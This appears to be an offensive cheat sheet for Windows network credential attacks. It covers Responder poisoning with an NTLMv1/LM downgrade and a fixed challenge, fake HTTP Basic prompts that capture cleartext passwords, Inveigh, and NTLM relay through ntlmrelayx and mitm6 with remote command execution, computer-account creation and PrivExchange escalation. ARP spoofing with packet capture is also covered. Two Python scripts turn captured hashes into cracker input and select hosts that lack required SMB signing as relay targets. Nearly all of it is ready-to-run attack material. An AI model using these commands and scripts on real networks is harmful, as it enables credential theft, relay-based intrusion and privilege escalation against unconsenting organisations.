Set Challenge = 1122334455667788 in /etc/responder/Responder.conf (the default is Random) so that every captured NTLMv1/LM response is computed over the same known challenge and can be looked up in precomputed tables instead of brute-forced.

Passive mode (-A: analyze only, answer nothing)

responder -I <interface> -A

Active mode (-w rogue WPAD proxy, -r answer NetBIOS wredir queries, -f fingerprint hosts)

responder -I <interface> -wrf

Aggressive mode (-F forces auth on wpad.dat retrieval, -P forces auth on the proxy, --lm asks for LM/NTLMv1 from clients that still allow the downgrade, XP/2003 era per Responder's help)

responder -I eth0 -wrf -F -P --lm >> responder.txt
grep -a "NTLMv1.*Hash" responder.txt | awk -F ": " '{print $2}'
grep -a "NTLMv" responder.txt | grep Hash
grep -a "NTLMv1.*Hash" responder.txt | awk -F ": " '{print $2}' | awk -F ":" '{print $1 "::::" $5 ":" $6}'

Hardcore mode (-b: HTTP Basic auth instead of NTLM, the user gets a prompt and the password arrives in cleartext)

responder -I eth0 -wrfb -F -P --lm >> responder.txt
grep -a -i password responder.txt -B3
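The grep/awk lines above as a Python script (an added example, not Responder's code): it handles both the "NTLMv1 Hash" and "NTLMv1-SSP Hash" spellings that Responder emits depending on the protocol, strips colour codes from console output, dedupes repeated captures, emits hashcat -m 5500/5600 input plus the NTRESP:CHALLENGE form used for table lookup, and reports NTLMv1 captures whose challenge is not the fixed 1122334455667788 (those cannot be looked up). SAMPLE_LOG is constructed to match Responder's output format; the hash values in it are synthetic.

```python
"""Turn Responder's captured hash lines into cracker input.

Added example, not part of Responder. SAMPLE_LOG is constructed to mimic
Responder's "[PROTO] NTLMv1[-SSP] Hash : ..." lines; the hashes are synthetic.
"""
import re

# Challenge set in Responder.conf so NTLMv1 responses can be looked up in precomputed tables
FIXED_CHALLENGE = "1122334455667788"

ANSI = re.compile(r"\x1b\[[0-9;]*m")  # Responder colours its console output
HASH_LINE = re.compile(
    r"\[(?P<proto>[A-Za-z0-9-]+)\]\s+NTLMv(?P<ver>[12])(?:-SSP)?\s+Hash\s*:\s*(?P<hash>\S+)"
)

SAMPLE_LOG = """\
[SMB] NTLMv2-SSP Client   : 10.0.0.5
[SMB] NTLMv2-SSP Username : CORP\\alice
[SMB] NTLMv2-SSP Hash     : alice::CORP:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000c0653150de09d201
[HTTP] NTLMv1 Client   : 10.0.0.6
[HTTP] NTLMv1 Username : CORP\\bob
[HTTP] NTLMv1 Hash     : bob::CORP:0123456789abcdef0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210fedcba9876543210:1122334455667788
[SMB] NTLMv1-SSP Hash     : carol::CORP:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb:deadbeefcafef00d
[SMB] NTLMv2-SSP Hash     : alice::CORP:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000c0653150de09d201
"""


def parse_responder_log(text):
    """Return one dict per unique hash, in first-seen order."""
    entries = {}
    for raw in text.splitlines():
        m = HASH_LINE.search(ANSI.sub("", raw))
        if not m or m.group("hash") in entries:
            continue
        f = m.group("hash").split(":")
        if len(f) < 6:
            continue  # truncated line, not a complete hash
        e = {"proto": m.group("proto"), "version": int(m.group("ver")),
             "hash": m.group("hash"), "user": f[0], "domain": f[2]}
        if e["version"] == 1:
            # user::DOMAIN:LMRESP:NTRESP:CHALLENGE
            e["lm_resp"], e["nt_resp"], e["challenge"] = f[3], f[4], f[5]
        else:
            # user::DOMAIN:CHALLENGE:NTPROOF:BLOB
            e["challenge"], e["nt_proof"], e["blob"] = f[3], f[4], f[5]
        entries[e["hash"]] = e
    return list(entries.values())


def hashcat_lines(entries, version):
    """Responder's own line format is what hashcat -m 5500 (v1) / -m 5600 (v2) expect."""
    return [e["hash"] for e in entries if e["version"] == version]


def cracksh_lines(entries):
    """NTLMv1 reduced to NTRESP:CHALLENGE, the form precomputed-table lookups take."""
    return [f"{e['nt_resp']}:{e['challenge']}" for e in entries if e["version"] == 1]


def non_fixed_challenges(entries):
    """Users whose NTLMv1 challenge is not FIXED_CHALLENGE (tables will not apply to them)."""
    return [e["user"] for e in entries
            if e["version"] == 1 and e["challenge"].lower() != FIXED_CHALLENGE]


if __name__ == "__main__":
    found = parse_responder_log(SAMPLE_LOG)
    for line in hashcat_lines(found, 1):
        print("5500", line)
    for line in hashcat_lines(found, 2):
        print("5600", line)
    for user in non_fixed_challenges(found):
        print("random challenge, no table lookup for:", user)
```

Feed it the responder.txt from the commands above (or logs/Responder-Session.log); the same functions work on either because the regex ignores whatever precedes the protocol tag.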


NTLM MITM attacks


Invoke-Inveigh -ConsoleOutput Y
Invoke-Inveigh -ConsoleOutput N -RunTime 15 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y

Packets can also be captured on the Windows host itself with netsh (no extra tooling needed) and the hashes extracted from the trace afterwards; the .etl file has to be converted (for example with etl2pcapng) before Wireshark or similar can parse the NTLM exchanges.

netsh trace start scenario=NetConnection capture=yes persistent=no maxSize=100MB traceFile=C:\NetTrace2.etl
netsh trace stop

NTLMv1 downgrade attack: the --lm flag used above makes Responder request LM/NTLMv1 responses from clients that still allow it, and with the fixed challenge from Responder.conf those responses can be resolved with precomputed tables rather than cracked.

NTLM Relay

The target must not require SMB signing for the relay to work (signing that is merely enabled does not stop it; domain controllers require it by default, workstations and member servers do not). Windows prefers IPv6 over IPv4 (Windows 10 included), which is what mitm6 abuses.

Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <ip> -Command "<cmd>" -Attack Enumerate,Execute,Session
cme smb <CIDR> --gen-relay-list smbrelay.txt
Turn SMB and HTTP off in /etc/responder/Responder.conf so Responder only poisons and ntlmrelayx owns those ports (-tf is an ntlmrelayx option, not a Responder one):
responder -I <interface> -r -d -w
ntlmrelayx.py -tf smbrelay.txt -smb2support
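What cme --gen-relay-list decides, as an added Python example (not CrackMapExec's or impacket's code): parse the SecurityMode field of an SMB2 NEGOTIATE response and treat the host as a relay target only when SIGNING_REQUIRED is absent. build_negotiate_response constructs the packets here rather than reading them off the wire, following the MS-SMB2 header and NEGOTIATE response layouts; the host addresses in the demo are made up.

```python
"""Pick relay targets from SMB2 NEGOTIATE responses.

Added example, not CrackMapExec's or impacket's code. A host is a relay
target when the SecurityMode of its SMB2 NEGOTIATE response lacks
SIGNING_REQUIRED; SIGNING_ENABLED on its own does not stop a relay.
Packets come from build_negotiate_response (a constructed fixture), not
from the wire.
"""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001   # set on every response
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002


def negotiate_security_mode(pkt):
    """SecurityMode of an SMB2 NEGOTIATE response (pkt without the 4-byte NetBIOS length prefix)."""
    if len(pkt) < SMB2_HEADER_LEN + 4 or pkt[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    # Header after the magic: StructureSize, CreditCharge, Status, Command, Credits, Flags
    hdr_size, _credit_charge, _status, command, _credits, flags = struct.unpack_from("<HHIHHI", pkt, 4)
    if hdr_size != SMB2_HEADER_LEN:
        raise ValueError("bad SMB2 header size")
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    # Response body starts with StructureSize (always 65) then SecurityMode
    body_size, security_mode = struct.unpack_from("<HH", pkt, SMB2_HEADER_LEN)
    if body_size != 65:
        raise ValueError("bad NEGOTIATE response body")
    return security_mode


def is_relay_target(pkt):
    """True unless the server requires signing; 'enabled' alone is not a defence."""
    return not negotiate_security_mode(pkt) & SMB2_NEGOTIATE_SIGNING_REQUIRED


def gen_relay_list(responses):
    """{host: negotiate response bytes} -> hosts to put in the ntlmrelayx target file."""
    return [host for host, pkt in responses.items() if is_relay_target(pkt)]


def build_negotiate_response(security_mode, dialect=0x0302):
    """Minimal SMB2 NEGOTIATE response carrying the given SecurityMode (constructed fixture)."""
    header = SMB2_MAGIC + struct.pack(
        "<HHIHHIIQIIQ16s",
        SMB2_HEADER_LEN, 0, 0, SMB2_NEGOTIATE, 1, SMB2_FLAGS_SERVER_TO_REDIR,
        0, 0, 0, 0, 0, b"\x00" * 16)   # NextCommand, MessageId, Reserved, TreeId, SessionId, Signature
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65, security_mode, dialect, 0, b"\x00" * 16,   # StructureSize, SecurityMode, Dialect, ContextCount, ServerGuid
        0, 0x800000, 0x800000, 0x800000,               # Capabilities, MaxTransact, MaxRead, MaxWrite
        0, 0, 0, 0, 0)                                 # SystemTime, ServerStartTime, SecBufOffset, SecBufLen, ContextOffset
    return header + body


if __name__ == "__main__":
    # Constructed: a workstation with the default "enabled, not required" and a DC that requires signing
    hosts = {
        "10.0.0.5": build_negotiate_response(SMB2_NEGOTIATE_SIGNING_ENABLED),
        "10.0.0.1": build_negotiate_response(SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }
    for host in gen_relay_list(hosts):
        print(host)
```

To use it on real hosts, send an SMB2 NEGOTIATE to port 445, strip the 4-byte NetBIOS session header from the reply and pass the rest to is_relay_target; the sysadmin's fix is the mirror image, setting RequireSecuritySignature so the flag appears.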

Add a computer account, then run BloodHound collection as that account (not tested)

ntlmrelayx.py -t ldaps://<dc_fqdn> --add-computer
bloodhound-python -d <domain> -u '<computer>$' -p '<password>' -c All

PrivExchange (not tested): the relay target is LDAP on the DC, the host Exchange is told to push to is the attacker, and the positional argument is the Exchange server, not the DC

ntlmrelayx.py -t ldap://<dc_fqdn> --escalate-user <user>
python privexchange.py -ah <attacker_fqdn> <exchange_fqdn> -u <user> -d <domain>


mitm6 only does the DNS/DHCPv6 spoofing; the WPAD serving and relaying (-wh, -t) belong to ntlmrelayx, run alongside it:
mitm6 -d <domain_fqdn> -i <interface>
ntlmrelayx.py -6 -wh <attacker_host> -t smb://<target_ip>/ -l loot -smb2support

Relay and delegation

ARP Spoofing

Without gateway (every host on the segment is told we are <target>; ip_forward keeps the victims' traffic flowing so nothing drops)

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 <target>
tcpdump -i eth0 -s 65535 -w out.pcap -vv

With gateway (<target> is told we are <gateway>; run a second arpspoof with the arguments swapped, -t <gateway> <target>, to also capture the return direction)

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 -t <target> <gateway>
tcpdump -i eth0 -s 65535 -w out.pcap -vv